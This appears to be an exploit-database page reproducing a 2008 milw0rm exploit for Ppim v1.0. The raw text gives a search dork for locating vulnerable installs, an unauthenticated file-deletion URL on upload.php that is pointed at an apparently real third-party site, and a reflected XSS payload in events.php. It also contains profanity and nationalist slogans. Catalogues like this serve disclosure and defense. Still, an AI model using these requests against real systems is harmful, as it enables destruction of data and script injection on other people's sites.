header-logo
Suggest Exploit
vendor:
Ppim
by:
BeyazKurt
7.5
CVSS
HIGH
File Delete and XSS
79, 264
CWE
Product Name: Ppim
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Ppim v1.0 File Delete and XSS Vulnerability

Ppim v1.0 is vulnerable to file delete and XSS attacks. The file delete vulnerability is present in the upload.php file, which can be exploited by sending a specially crafted HTTP request to the vulnerable script. The XSS vulnerability is present in the events.php file, which can be exploited by sending a specially crafted HTTP request to the vulnerable script.

Mitigation:

Ensure that the application is not vulnerable to XSS attacks by validating all user-supplied input. Ensure that the application is not vulnerable to file delete attacks by properly validating user-supplied input.
Source

Exploit-DB raw data:

##########################################################
#Author : BeyazKurt
#Contact : Djm-sut@Hotmail.Com
#
#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ]
#Download : http://scripts.ringsworld.com/organizers/ppim.zip
#
# D0rk :  inurl:events.php?listallevents
#
# File Delete Vulnerability: upload.php
#
# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
#
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#
# XSS Vulnerability: events.php
#
#[CODE]
#  <?php
#  if (isset($_GET['date']))
#  {
#    $date_id = $_GET['date'];
#  print "<a href=\"events.php?mode=new&date=$date_id\">New Event</a><br / >";
#  }
#  ?>
#[/CODE]
#
#Exploit :
# events.php?mode=new&date=XSS CODE
# events.php?mode=new&date="><script>alert('XSS')</script>
# -------------------------------
#
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#  pigs for dedication : :  WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
#                      Proud 2 Be ALBANIAN
#
# MTK : 0 - 5 : FenerBahçe (H)
#
# Not : Fuck off pala! aq lameri.
# Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate.
#######################################################

# milw0rm.com [2008-08-10]

Navigation

Suggest Exploit

Services By CQR